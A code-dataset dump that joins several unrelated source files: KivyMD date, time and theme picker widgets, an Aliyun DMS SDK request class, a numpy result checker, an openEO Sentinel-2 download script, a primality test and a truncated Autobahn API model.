pos: root.pos[0] + root.size[0] - self.width - dp(10), root.pos[1] + dp(10)
text: "OK"
on_release: root.ok_click()
MDFlatButton:
id: cancel_button
pos: root.pos[0] + root.size[0] - self.width - ok_button.width - dp(10), root.pos[1] + dp(10)
text: "Cancel"
on_release: root.dismiss()
<DayButton>
size_hint: None, None
size:
(dp(40), dp(40)) if root.theme_cls.device_orientation == "portrait" \
else (dp(32), dp(32))
MDLabel:
font_style: "Caption"
theme_text_color: "Custom" if root.is_today and not root.is_selected else "Primary"
text_color: root.theme_cls.primary_color
opposite_colors:
root.is_selected if root.owner.sel_month == root.owner.month \
and root.owner.sel_year == root.owner.year \
and str(self.text) == str(root.owner.sel_day) else False
size_hint_x: None
valign: "middle"
halign: "center"
text: root.text
<WeekdayLabel>
font_style: "Caption"
theme_text_color: "Secondary"
size: (dp(40), dp(40)) if root.theme_cls.device_orientation == "portrait" \
else (dp(32), dp(32))
size_hint: None, None
text_size: self.size
valign:
"middle" if root.theme_cls.device_orientation == "portrait" \
else "bottom"
halign: "center"
<DaySelector>
size:
(dp(40), dp(40)) if root.theme_cls.device_orientation == "portrait" \
else (dp(32), dp(32))
size_hint: (None, None)
canvas:
Color:
rgba: self.theme_cls.primary_color if self.shown else [0, 0, 0, 0]
Ellipse:
size:
(dp(40), dp(40)) \
if root.theme_cls.device_orientation == "portrait" \
else (dp(32), dp(32))
pos:
self.pos if root.theme_cls.device_orientation == "portrait" \
else (self.pos[0], self.pos[1])
"""
)
class DaySelector(ThemableBehavior, AnchorLayout):
shown = BooleanProperty(False)
def __init__(self, parent):
super().__init__()
self.parent_class = parent
self.parent_class.add_widget(self, index=7)
self.selected_widget = None
Window.bind(on_resize=self.move_resize)
def update(self):
parent = self.parent_class
if parent.sel_month == parent.month and parent.sel_year == parent.year:
self.shown = True
else:
self.shown = False
def set_widget(self, widget):
self.selected_widget = widget
self.pos = widget.pos
self.move_resize(do_again=True)
self.update()
def move_resize(self, window=None, width=None, height=None, do_again=True):
self.pos = self.selected_widget.pos
if do_again:
Clock.schedule_once(
lambda x: self.move_resize(do_again=False), 0.01
)
class DayButton(
ThemableBehavior, CircularRippleBehavior, ButtonBehavior, AnchorLayout
):
text = StringProperty()
owner = ObjectProperty()
is_today = BooleanProperty(False)
is_selected = BooleanProperty(False)
def on_release(self):
self.owner.set_selected_widget(self)
class WeekdayLabel(MDLabel):
pass
class MDDatePicker(
FloatLayout,
ThemableBehavior,
RectangularElevationBehavior,
SpecificBackgroundColorBehavior,
ModalView,
):
_sel_day_widget = ObjectProperty()
cal_list = None
cal_layout = ObjectProperty()
sel_year = NumericProperty()
sel_month = NumericProperty()
sel_day = NumericProperty()
day = NumericProperty()
month = NumericProperty()
year = NumericProperty()
today = date.today()
callback = ObjectProperty()
background_color = ColorProperty([0, 0, 0, 0.7])
class SetDateError(Exception):
pass
def __init__(
self,
callback,
year=None,
month=None,
day=None,
firstweekday=0,
min_date=None,
max_date=None,
**kwargs,
):
self.callback = callback
self.cal = calendar.Calendar(firstweekday)
self.sel_year = year if year else self.today.year
self.sel_month = month if month else self.today.month
self.sel_day = day if day else self.today.day
self.month = self.sel_month
self.year = self.sel_year
self.day = self.sel_day
self.min_date = min_date
self.max_date = max_date
super().__init__(**kwargs)
self.selector = DaySelector(parent=self)
self.generate_cal_widgets()
self.update_cal_matrix(self.sel_year, self.sel_month)
self.set_month_day(self.sel_day)
self.selector.update()
def ok_click(self):
self.callback(date(self.sel_year, self.sel_month, self.sel_day))
self.dismiss()
def fmt_lbl_date(self, year, month, day, orientation):
d = datetime.date(int(year), int(month), int(day))
separator = "\n" if orientation == "landscape" else " "
return (
d.strftime("%a,").capitalize()
+ separator
+ d.strftime("%b").capitalize()
+ " "
+ str(day).lstrip("0")
)
def set_date(self, year, month, day):
try:
date(year, month, day)
except Exception as e:
if str(e) == "day is out of range for month":
raise self.SetDateError(
" Day %s day is out of range for month %s" % (day, month)
)
elif str(e) == "month must be in 1..12":
raise self.SetDateError(
"Month must be between 1 and 12, got %s" % month
)
elif str(e) == "year is out of range":
raise self.SetDateError(
"Year must be between %s and %s, got %s"
% (datetime.MINYEAR, datetime.MAXYEAR, year)
)
else:
self.sel_year = year
self.sel_month = month
self.sel_day = day
self.month = self.sel_month
self.year = self.sel_year
self.day = self.sel_day
self.update_cal_matrix(self.sel_year, self.sel_month)
self.set_month_day(self.sel_day)
self.selector.update()
def set_selected_widget(self, widget):
if self._sel_day_widget:
self._sel_day_widget.is_selected = False
widget.is_selected = True
self.sel_month = int(self.month)
self.sel_year = int(self.year)
self.sel_day = int(widget.text)
self._sel_day_widget = widget
self.selector.set_widget(widget)
def set_month_day(self, day):
for idx in range(len(self.cal_list)):
if str(day) == str(self.cal_list[idx].text):
self._sel_day_widget = self.cal_list[idx]
self.sel_day = int(self.cal_list[idx].text)
if self._sel_day_widget:
self._sel_day_widget.is_selected = False
self._sel_day_widget = self.cal_list[idx]
self.cal_list[idx].is_selected = True
self.selector.set_widget(self.cal_list[idx])
def update_cal_matrix(self, year, month):
try:
dates = [x for x in self.cal.itermonthdates(year, month)]
except ValueError as e:
if str(e) == "year is out of range":
pass
else:
self.year = year
self.month = month
for idx in range(len(self.cal_list)):
if idx >= len(dates) or dates[idx].month != month:
self.cal_list[idx].disabled = True
self.cal_list[idx].text = ""
else:
if self.min_date and self.max_date:
self.cal_list[idx].disabled = (
True
if (
dates[idx] < self.min_date
or dates[idx] > self.max_date
)
else False
)
elif self.min_date:
if isinstance(self.min_date, date):
self.cal_list[idx].disabled = (
True if dates[idx] < self.min_date else False
)
else:
raise ValueError(
"min_date must be of type {} or None, got {}".format(
date, type(self.min_date)
)
)
elif self.max_date:
if isinstance(self.max_date, date):
self.cal_list[idx].disabled = (
True if dates[idx] > self.max_date else False
)
else:
raise ValueError(
"max_date must be of type {} or None, got {}".format(
date, type(self.min_date)
)
)
else:
self.cal_list[idx].disabled = False
self.cal_list[idx].text = str(dates[idx].day)
self.cal_list[idx].is_today = dates[idx] == self.today
self.selector.update()
def generate_cal_widgets(self):
cal_list = []
for day in self.cal.iterweekdays():
self.cal_layout.add_widget(
WeekdayLabel(text=calendar.day_abbr[day][0].upper())
)
for i in range(6 * 7): # 6 weeks, 7 days a week
db = DayButton(owner=self)
cal_list.append(db)
self.cal_layout.add_widget(db)
self.cal_list = cal_list
def change_month(self, operation):
op = 1 if operation == "next" else -1
sl, sy = self.month, self.year
m = 12 if sl + op == 0 else 1 if sl + op == 13 else sl + op
y = sy - 1 if sl + op == 0 else sy + 1 if sl + op == 13 else sy
self.update_cal_matrix(y, m)
Builder.load_string(
"""
#:import CircularTimePicker kivymd.vendor.circularTimePicker.CircularTimePicker
#:import dp kivy.metrics.dp
<MDTimePicker>
size_hint: (None, None)
size: (dp(270), dp(335) + dp(95))
pos_hint: {"center_x": .5, "center_y": .5}
canvas:
Color:
rgba: self.theme_cls.bg_light
RoundedRectangle:
size: (dp(270), dp(335))
pos: (root.pos[0], root.pos[1] + root.height - dp(335) - dp(95))
radius: [dp(0), dp(0), root.radius[2], root.radius[3]]
Color:
rgba: self.theme_cls.primary_color
RoundedRectangle:
size: (dp(270), dp(95))
pos: (root.pos[0], root.pos[1] + root.height - dp(95))
radius: [root.radius[0], root.radius[1], dp(0), dp(0)]
Color:
rgba: self.theme_cls.bg_dark
Ellipse:
size: (dp(220), dp(220))
pos:
root.pos[0] + dp(270) / 2 - dp(220) / 2, root.pos[1] \
+ root.height - (dp(335) / 2 + dp(95)) - dp(220) / 2 + dp(35)
CircularTimePicker:
id: time_picker
pos: (dp(270) / 2) - (self.width / 2), root.height - self.height
size_hint: (.8, .8)
pos_hint: {"center_x": .5, "center_y": .585}
military: root.military
MDFlatButton:
width: dp(32)
id: ok_button
pos:
root.pos[0] + root.size[0] - self.width - dp(10), \
root.pos[1] + dp(10)
text: "OK"
on_release: root.close_ok()
MDFlatButton:
id: cancel_button
pos:
root.pos[0] + root.size[0] - self.width - ok_button.width \
- dp(10), root.pos[1] + dp(10)
text: "Cancel"
on_release: root.close_cancel()
"""
)
class MDTimePicker(
ThemableBehavior, FloatLayout, ModalView, RectangularElevationBehavior
):
time = ObjectProperty()
"""
Users method. Must take two parameters:
.. code-block:: python
def get_time(self, instance, time):
'''
The method returns the set time.
:type instance: <kivymd.uix.picker.MDTimePicker object>
:type time: <class 'datetime.time'>
'''
return time
:attr:`time` is an :class:`~kivy.properties.ObjectProperty`
and defaults to `None`.
"""
radius = ListProperty([0, 0, 0, 0])
"""
Corner radius values.
:attr:`radius` is an :class:`~kivy.properties.ListProperty`
and defaults to `'[0, 0, 0, 0]'`.
"""
military = BooleanProperty(False)
"""
24H Mode.
:attr:`military` is an :class:`~kivy.properties.BooleanProperty`
and defaults to `False`.
"""
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.current_time = self.ids.time_picker.time
def set_time(self, time):
"""
Sets user time.
:type time: <class 'datetime.time'>
"""
try:
self.ids.time_picker.set_time(time)
except AttributeError:
raise TypeError(
"MDTimePicker._set_time must receive a datetime object, "
'not a "' + type(time).__name__ + '"'
)
def close_cancel(self):
self.dismiss()
def close_ok(self):
self.current_time = self.ids.time_picker.time
self.time = self.current_time
self.dismiss()
Builder.load_string(
"""
<Tab@BoxLayout+MDTabsBase>
<ColorSelector>
size: dp(40), dp(40)
pos: self.pos
size_hint: (None, None)
canvas:
Color:
rgba: root.rgb_hex(root.color_name)
Ellipse:
size: self.size
pos: self.pos
<AccentColorSelector@ColorSelector>
on_release: app.theme_cls.accent_palette = root.color_name
<PrimaryColorSelector@ColorSelector>
on_release: app.theme_cls.primary_palette = root.color_name
<MDThemePicker>
size_hint: (None, None)
size: dp(284), dp(120) + dp(290)
pos_hint: {"center_x": .5, "center_y": .5}
canvas:
Color:
rgb: app.theme_cls.primary_color
RoundedRectangle:
size: self.width, dp(120)
pos: root.pos[0], root.pos[1] + root.height - dp(120)
radius: [root.radius[0], root.radius[1], dp(0), dp(0)]
Color:
rgb: app.theme_cls.bg_normal
RoundedRectangle:
size: self.width, dp(290)
pos: root.pos[0], root.pos[1] + root.height - (dp(120) + dp(290))
radius: [dp(0), dp(0), root.radius[2], root.radius[3]]
MDFlatButton:
id: close_button
pos: root.pos[0] + root.size[0] - self.width - dp(10), root.pos[1] + dp(10)
text: "Close"
on_release: root.dismiss()
MDLabel:
id: title
font_style: "H5"
text: "Change theme"
size_hint: (None, None)
size: dp(160), dp(50)
pos_hint: {"center_x": .5, "center_y": .9}
theme_text_color: "Custom"
text_color: root.specific_text_color
MDTabs:
size_hint: (None, None)
size: root.width, root.height - dp(135)
pos_hint: {"center_x": .5, "center_y": .475}
id: tab_panel
Tab:
id: theme_tab
text: "Theme"
BoxLayout:
spacing: dp(4)
padding: dp(4)
size_hint: (None, None)
size: dp(270), root.height # -dp(120)
pos_hint: {"center_x": .532, "center_y": .89}
orientation: "vertical"
BoxLayout:
size_hint: (None, None)
pos_hint: {"center_x": .5, "center_y": .5}
size: dp(230), dp(40)
pos: self.pos
halign: "center"
orientation: "horizontal"
BoxLayout:
PrimaryColorSelector:
color_name: "Red"
BoxLayout:
PrimaryColorSelector:
color_name: "Pink"
BoxLayout:
PrimaryColorSelector:
color_name: "Purple"
BoxLayout:
PrimaryColorSelector:
color_name: "DeepPurple"
BoxLayout:
size_hint: (None, None)
pos_hint: {"center_x": .5, "center_y": .5}
size: dp(230), dp(40)
pos: self.pos
halign: "center"
orientation: "horizontal"
BoxLayout:
PrimaryColorSelector:
color_name: "Indigo"
BoxLayout:
PrimaryColorSelector:
color_name: "Blue"
BoxLayout:
PrimaryColorSelector:
color_name: "LightBlue"
BoxLayout:
PrimaryColorSelector:
color_name: "Cyan"
BoxLayout:
size_hint: (None, None)
pos_hint: {"center_x": .5, "center_y": .5}
size: dp(230), dp(40)
pos: self.pos
halign: "center"
orientation: "horizontal"
padding: 0, 0, 0, dp(1)
BoxLayout:
PrimaryColorSelector:
color_name: "Teal"
BoxLayout:
PrimaryColorSelector:
color_name: "Green"
BoxLayout:
PrimaryColorSelector:
color_name: "LightGreen"
BoxLayout:
PrimaryColorSelector:
color_name: "Lime"
BoxLayout:
size_hint: (None, None)
pos_hint: {"center_x": .5, "center_y": .5}
size: dp(230), dp(40)
pos: self.pos
orientation: "horizontal"
halign: "center"
padding: 0, 0, 0, dp(1)
BoxLayout:
PrimaryColorSelector:
color_name: "Yellow"
BoxLayout:
PrimaryColorSelector:
color_name: "Amber"
BoxLayout:
PrimaryColorSelector:
color_name: "Orange"
BoxLayout:
PrimaryColorSelector:
color_name: "DeepOrange"
BoxLayout:
size_hint: (None, None)
pos_hint: {"center_x": .5, "center_y": .5}
size: dp(230), dp(40)
#pos: self.pos
orientation: "horizontal"
padding: 0, 0, 0, dp(1)
BoxLayout:
PrimaryColorSelector:
color_name: "Brown"
BoxLayout:
PrimaryColorSelector:
color_name: "Gray"
BoxLayout:
PrimaryColorSelector:
color_name: "BlueGray"
BoxLayout:
MDIconButton:
size: dp(40), dp(40)
size_hint: (None, None)
canvas:
Color:
rgba: app.theme_cls.bg_normal
Ellipse:
size: self.size
pos: self.pos
disabled: True
Tab:
id: accent_tab
text: "Accent"
BoxLayout:
spacing: dp(4)
padding: dp(4)
size_hint: (None, None)
size: dp(270), root.height # -dp(120)
pos_hint: {"center_x": .532, "center_y": .89}
orientation: "vertical"
BoxLayout:
size_hint: (None, None)
pos_hint: {"center_x": .5, "center_y": .5}
size: dp(230), dp(40)
pos: self.pos
halign: "center"
orientation: "horizontal"
BoxLayout:
AccentColorSelector:
color_name: "Red"
BoxLayout:
AccentColorSelector:
color_name: "Pink"
BoxLayout:
AccentColorSelector:
color_name: "Purple"
BoxLayout:
AccentColorSelector:
color_name: "DeepPurple"
BoxLayout:
size_hint: (None, None)
pos_hint: {"center_x": .5, "center_y": .5}
size: dp(230), dp(40)
pos: self.pos
halign: "center"
orientation: "horizontal"
BoxLayout:
AccentColorSelector:
color_name: "Indigo"
BoxLayout:
AccentColorSelector:
color_name: "Blue"
BoxLayout:
AccentColorSelector:
color_name: "LightBlue"
BoxLayout:
AccentColorSelector:
color_name: "Cyan"
BoxLayout:
size_hint: (None, None)
pos_hint: {"center_x": .5, "center_y": .5}
size: dp(230), dp(40)
pos: self.pos
halign: "center"
orientation: "horizontal"
padding: 0, 0, 0, dp(1)
BoxLayout:
AccentColorSelector:
color_name: "Teal"
BoxLayout:
AccentColorSelector:
color_name: "Green"
BoxLayout:
AccentColorSelector:
color_name: "LightGreen"
BoxLayout:
AccentColorSelector:
color_name: "Lime"
BoxLayout:
size_hint: (None, None)
pos_hint: {"center_x": .5, "center_y": .5}
size: dp(230), dp(40)
pos: self.pos
orientation: "horizontal"
halign: "center"
padding: 0, 0, 0, dp(1)
BoxLayout:
AccentColorSelector:
color_name: "Yellow"
BoxLayout:
AccentColorSelector:
color_name: "Amber"
BoxLayout:
AccentColorSelector:
color_name: "Orange"
BoxLayout:
AccentColorSelector:
color_name: "DeepOrange"
BoxLayout:
size_hint: (None, None)
pos_hint: {"center_x": .5, "center_y": .5}
size: dp(230), dp(40)
#pos: self.pos
orientation: "horizontal"
padding: 0, 0, 0, dp(1)
BoxLayout:
AccentColorSelector:
color_name: "Brown"
BoxLayout:
AccentColorSelector:
color_name: "Gray"
BoxLayout:
AccentColorSelector:
color_name: "BlueGray"
BoxLayout:
MDIconButton:
size: dp(40), dp(40)
size_hint: (None, None)
canvas:
Color:
rgba: app.theme_cls.bg_normal
Ellipse:
size: self.size
pos: self.pos
disabled: True
Tab:
id: style_tab
text: "Style"
FloatLayout:
size: self.size
pos: self.pos
BoxLayout:
size_hint: (None, None)
pos_hint: {"center_x": .5, "center_y": .6}
halign: "center"
valign: "center"
spacing: dp(10)
width: dp(210)
height: dp(100)
MDIconButton:
size: dp(100), dp(100)
size_hint: (None, None)
canvas:
Color:
rgba: 1, 1, 1, 1
Ellipse:
size: self.size
pos: self.pos
Color:
rgba: 0, 0, 0, 1
Line:
width: 1.
circle: (self.center_x, self.center_y, dp(50))
on_release: app.theme_cls.theme_style = "Light"
MDIconButton:
size: dp(100), dp(100)
pos: self.pos
size_hint: (None, None)
canvas:
Color:
rgba: 0, 0, 0, 1
Ellipse:
size: self.size
pos: self.pos
on_release: app.theme_cls.theme_style = "Dark"
"""
)
class ColorSelector(MDIconButton):
color_name = OptionProperty("Indigo", options=palette)
def rgb_hex(self, col):
return get_color_from_hex(colors[col][self.theme_cls.accent_hue])
class MDThemePicker(
ThemableBehavior,
FloatLayout,
ModalView,
SpecificBackgroundColorBehavior,
RectangularElevationBehavior,
):
pass
| 32.477312
| 101
| 0.494935
|
4a18a2a813e89d2ad894cff5004a0d031e39fd9d
| 2,266
|
py
|
Python
|
aliyun-python-sdk-dms-enterprise/aliyunsdkdms_enterprise/request/v20181101/CreateDataCronClearOrderRequest.py
|
yndu13/aliyun-openapi-python-sdk
|
12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5
|
[
"Apache-2.0"
] | 1,001
|
2015-07-24T01:32:41.000Z
|
2022-03-25T01:28:18.000Z
|
aliyun-python-sdk-dms-enterprise/aliyunsdkdms_enterprise/request/v20181101/CreateDataCronClearOrderRequest.py
|
yndu13/aliyun-openapi-python-sdk
|
12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5
|
[
"Apache-2.0"
] | 363
|
2015-10-20T03:15:00.000Z
|
2022-03-08T12:26:19.000Z
|
aliyun-python-sdk-dms-enterprise/aliyunsdkdms_enterprise/request/v20181101/CreateDataCronClearOrderRequest.py
|
yndu13/aliyun-openapi-python-sdk
|
12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5
|
[
"Apache-2.0"
] | 682
|
2015-09-22T07:19:02.000Z
|
2022-03-22T09:51:46.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkdms_enterprise.endpoint import endpoint_data
import json
class CreateDataCronClearOrderRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'dms-enterprise', '2018-11-01', 'CreateDataCronClearOrder','dms-enterprise')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_Tid(self): # Long
return self.get_query_params().get('Tid')
def set_Tid(self, Tid): # Long
self.add_query_param('Tid', Tid)
def get_AttachmentKey(self): # String
return self.get_query_params().get('AttachmentKey')
def set_AttachmentKey(self, AttachmentKey): # String
self.add_query_param('AttachmentKey', AttachmentKey)
def get_Param(self): # Struct
return self.get_query_params().get('Param')
def set_Param(self, Param): # Struct
self.add_query_param("Param", json.dumps(Param))
def get_Comment(self): # String
return self.get_query_params().get('Comment')
def set_Comment(self, Comment): # String
self.add_query_param('Comment', Comment)
def get_RelatedUserList(self): # Array
return self.get_query_params().get('RelatedUserList')
def set_RelatedUserList(self, RelatedUserList): # Array
self.add_query_param("RelatedUserList", json.dumps(RelatedUserList))
| 37.766667
| 105
| 0.75684
|
4a18a2b5a3a2d04907f74754b61ae090b17ff447
| 584
|
py
|
Python
|
examples/runner/parallel/validate_results.py
|
zpxbjdx/Hetu
|
e84b6436b668e56b4e97a5fcc2ced08780f2a3c3
|
[
"Apache-2.0"
] | 82
|
2021-07-20T02:45:54.000Z
|
2022-03-14T07:08:45.000Z
|
examples/runner/parallel/validate_results.py
|
zpxbjdx/Hetu
|
e84b6436b668e56b4e97a5fcc2ced08780f2a3c3
|
[
"Apache-2.0"
] | 4
|
2021-11-25T13:39:21.000Z
|
2022-03-13T04:14:14.000Z
|
examples/runner/parallel/validate_results.py
|
zpxbjdx/Hetu
|
e84b6436b668e56b4e97a5fcc2ced08780f2a3c3
|
[
"Apache-2.0"
] | 13
|
2021-07-18T14:40:56.000Z
|
2022-03-09T06:37:42.000Z
|
import numpy as np
import os.path as osp
import argparse
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('number', default=None)
parser.add_argument('--rtol', default='1e-6')
args = parser.parse_args()
directory = 'results'
base = np.load(osp.join(directory, 'base.npy'))
print('Ground truth:', base)
for i in range(int(args.number)):
res = np.load(osp.join(directory, 'res%d.npy' % i))
np.testing.assert_allclose(base, res, rtol=float(args.rtol))
print('Result id %d passed test.' % i, res)
| 32.444444
| 68
| 0.652397
|
4a18a2dd8c98ffad58f2b364cd3d1d9c8c813dce
| 5,176
|
py
|
Python
|
examples/py3_process_wrapper-wcps_eurac.py
|
ghtmtt/openeo-python-client
|
9277941574d3ba839562c650e2530b51f29640a2
|
[
"Apache-2.0"
] | null | null | null |
examples/py3_process_wrapper-wcps_eurac.py
|
ghtmtt/openeo-python-client
|
9277941574d3ba839562c650e2530b51f29640a2
|
[
"Apache-2.0"
] | null | null | null |
examples/py3_process_wrapper-wcps_eurac.py
|
ghtmtt/openeo-python-client
|
9277941574d3ba839562c650e2530b51f29640a2
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
import json
import logging
from datetime import datetime
import openeo
from openeo.rest.imagecollectionclient import ImageCollectionClient
import sys
logger = logging.getLogger(__name__)
def execute(
out_dir,
user,
password,
provider,
driver_url,
image_collection,
all_bands,
bands,
band_format,
bbox_string,
temporal_extent,
):
"""
Identification:
Name -- OpenEO PoC
Description -- Retrieve Sentinel 2 bands in GeoTIFF
Version -- 1-hbo
Author -- Alexander Jacob, Eurac Research, openEO
Mission -- hackathon
Inputs:
user -- User -- 45/User String -- guest
password -- Password -- 45/User String -- guest_123
provider -- Provider -- 45/User String -- Eurac Research
driver_url -- Driver URL -- 45/User String -- https://openeo.eurac.edu
image_collection -- Image Collection -- 45/User String -- S2_L2A_T32TPS_20M
all_bands -- Bands -- 45/User String -- AOT B02 B03 B04 B05 B06 B07 B8A B11 B12 SCL VIS WVP CLD SNW
bands -- Bands -- 45/User String -- B03 B11
band_format -- Band Format -- 45/User String -- gtiff
bbox_string -- BBox -- 45/User String -- 10.446624755859375, 46.72574176193996, 10.629272460937498, 46.845164430292755
temporal_extent -- Temporal Extent -- 44/DateRange -- 2016-06-28T00:00:00.000Z/2016-06-28T00:00:00.000Z
Outputs:
band_dir -- Band Directory -- 45/User String
band_files -- Band Files -- 45/User String
Main Dependency:
python-3
Software Dependencies:
openeo-0.4
Processing Resources:
ram -- 1
disk -- 10
cpu -- 1
"""
all_bands = all_bands.split()
bands = bands.split()
temporal_extent = temporal_extent.split("/")
west, south, east, north = list(map(lambda value: value.strip(), bbox_string.split(",")))
bbox = {"west": west, "east": east, "south": south, "north": north, "crs": "EPSG:4326"}
logger.info("Demo user:password: %s:%s", user, password)
logger.info("Provider: %s with driver URL %s", provider, driver_url)
logger.info("Image Collection: %s", image_collection)
logger.info("Bands: %s", bands)
logger.info("Using BBox in str format - raw input (west, south, east, north): %s", bbox_string)
logger.info("BBox: %s", bbox)
logger.info("Temporal extent in string format start/end: %s", temporal_extent)
connection = openeo.connect(driver_url)
connection.authenticate_basic(user, password)
logger.info(
"describe_collection('%s'):\n %s\n",
image_collection,
json.dumps(connection.describe_collection(image_collection), indent=2),
)
cube = ImageCollectionClient.load_collection(session = connection, collection_id = image_collection, bands = all_bands)
cube = cube.filter_bbox( **bbox)
cube = cube.filter_temporal(extent=temporal_extent)
logger.info("cube.graph: \n%s\n", json.dumps(cube.graph, indent=2))
logger.info("File Format: %s", band_format)
logger.info(
"File Name Format: {provider}.{image_collection}.{west}.{south}.{east}.{north}."
"{temporal_extent[0]}.{temporal_extent[1]}.B{band.zfill(2)}.{band_format}"
)
band_dir = out_dir
logger.info("Downloading bands in %s", out_dir)
band_files = []
for band in bands:
cube_band = cube.band(band)
band_file = (
f"{provider}.{image_collection}.{west}.{south}.{east}.{north}."
f"{temporal_extent[0]}.{temporal_extent[1]}.B{band.zfill(2)}.{band_format.lower()}"
)
logger.info("Downloading band %s: %s", band, band_file)
band_path = f"{out_dir}/{band_file}"
band_files.append(band_file)
logger.info("Starting download at %s", datetime.now())
cube_band.download(band_path, format=band_format)
logger.info("Download finished for band %s at %s", band, datetime.now())
logger.info("Downloads finished at %s", datetime.now())
return {"band_dir": band_dir, "band_files": band_files}
def example():
execute(
out_dir="/tmp",
user="guest",
password="guest_123",
provider="Eurac Research",
driver_url="https://openeo.eurac.edu",
image_collection="S2_L2A_T32TPS_20M",
bands="B03 B11",
band_format="gtiff",
# Rumst bbox w,s,e,n
bbox_string="10.446624755859375, 46.72574176193996, 10.629272460937498, 46.845164430292755",
temporal_extent="2016-06-28/2016-06-28",
)
if __name__ == "__main__":
# Configure logger to add output to stdout/stderr
formatter = logging.Formatter(fmt="%(levelname)s - %(message)s")
handlers = [logging.StreamHandler()]
for handler in handlers:
handler.setFormatter(formatter)
level = logging.getLevelName(logging.DEBUG)
logger.setLevel(level)
for handler in handlers:
logger.addHandler(handler)
# called from process_wrapper.py
# py3_process_wrapper.py out_dir /tmp user eopen ...
kwargs = {var: value for var, value in list(zip(*[sys.argv[i + 1 :: 2] for i in (0, 1)]))}
logger.debug("kwargs from sys.argv: \n %s", kwargs)
print(execute(**kwargs))
| 35.944444
| 123
| 0.656685
|
4a18a3a20fc8d0ccb52c0c5ee1da5be156d39bb8
| 916
|
py
|
Python
|
misc/primality.py
|
computablelabs/starks
|
f8e45d56c3934a1cf24220b58e073434379e3d78
|
[
"MIT"
] | 9
|
2018-11-30T18:53:54.000Z
|
2021-11-15T20:59:08.000Z
|
misc/primality.py
|
computablelabs/starks
|
f8e45d56c3934a1cf24220b58e073434379e3d78
|
[
"MIT"
] | 13
|
2018-11-30T00:13:49.000Z
|
2019-04-04T20:14:29.000Z
|
misc/primality.py
|
computablelabs/starks
|
f8e45d56c3934a1cf24220b58e073434379e3d78
|
[
"MIT"
] | 1
|
2020-05-14T20:35:48.000Z
|
2020-05-14T20:35:48.000Z
|
import random
def decompose(n):
exponentOfTwo = 0
while n % 2 == 0:
n = n // 2 # using / turns large numbers into floats
exponentOfTwo += 1
return exponentOfTwo, n
def isWitness(possibleWitness, p, exponent, remainder):
if pow(possibleWitness, remainder, p) == 1:
return False
if any(
pow(possibleWitness, 2**i * remainder, p) == p - 1
for i in range(exponent)):
return False
return True
def probablyPrime(p, accuracy=100):
if p == 2 or p == 3:
return True
if p < 2 or p % 2 == 0:
return False
exponent, remainder = decompose(p - 1)
for _ in range(accuracy):
possibleWitness = random.randint(2, p - 2)
if isWitness(possibleWitness, p, exponent, remainder):
return False
return True
if __name__ == "__main__":
n = 1
while not probablyPrime(n, accuracy=100):
n = random.getrandbits(512)
print("{} is prime".format(n))
| 18.693878
| 58
| 0.635371
|
4a18a410ef7581108c9ea426a1017cdf8f72c301
| 13,268
|
py
|
Python
|
deutschland/autobahn/model/display_type.py
|
kiranmusze/deutschland
|
86d8ead3f38ad88ad66bb338b9f5a8db06992344
|
[
"Apache-2.0"
] | null | null | null |
deutschland/autobahn/model/display_type.py
|
kiranmusze/deutschland
|
86d8ead3f38ad88ad66bb338b9f5a8db06992344
|
[
"Apache-2.0"
] | null | null | null |
deutschland/autobahn/model/display_type.py
|
kiranmusze/deutschland
|
86d8ead3f38ad88ad66bb338b9f5a8db06992344
|
[
"Apache-2.0"
] | null | null | null |
"""
Autobahn App API
Was passiert auf Deutschlands Bundesstraßen? API für aktuelle Verwaltungsdaten zu Baustellen, Staus und Ladestationen. Außerdem Zugang zu Verkehrsüberwachungskameras und vielen weiteren Datensätzen. # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from deutschland.autobahn.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
from ..model_utils import OpenApiModel
from deutschland.autobahn.exceptions import ApiAttributeError
class DisplayType(ModelSimple):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
("value",): {
"ROADWORKS": "ROADWORKS",
"WEBCAM": "WEBCAM",
"PARKING": "PARKING",
"WARNING": "WARNING",
"WEIGHT_LIMIT_35": "WEIGHT_LIMIT_35",
"CLOSURE": "CLOSURE",
"CLOSURE_ENTRY_EXIT": "CLOSURE_ENTRY_EXIT",
"STRONG_ELECTRIC_CHARGING_STATION": "STRONG_ELECTRIC_CHARGING_STATION",
"SHORT_TERM_ROADWORKS": "SHORT_TERM_ROADWORKS",
"ELECTRIC_CHARGING_STATION": "ELECTRIC_CHARGING_STATION",
},
}
validations = {}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
return (
bool,
date,
datetime,
dict,
